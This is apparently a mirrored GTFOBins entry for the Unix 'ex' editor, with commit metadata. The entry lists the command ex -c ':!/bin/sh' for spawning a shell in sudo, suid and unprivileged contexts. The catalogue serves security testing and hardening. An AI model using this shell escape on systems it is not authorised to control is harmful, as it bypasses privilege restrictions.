1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 06:31:33 +01:00
GTFOBins.github.io/_gtfobins/ex
Markus Tamm 96bf318418 Add ex shell
Close #489.
2026-01-19 01:58:00 +01:00

20 lines
247 B
Plaintext

---
functions:
inherit:
- code: |-
ex
contexts:
sudo:
suid:
unprivileged:
from: ed
shell:
- code: |-
ex -c ':!/bin/sh'
contexts:
sudo:
suid:
shell: true
unprivileged:
...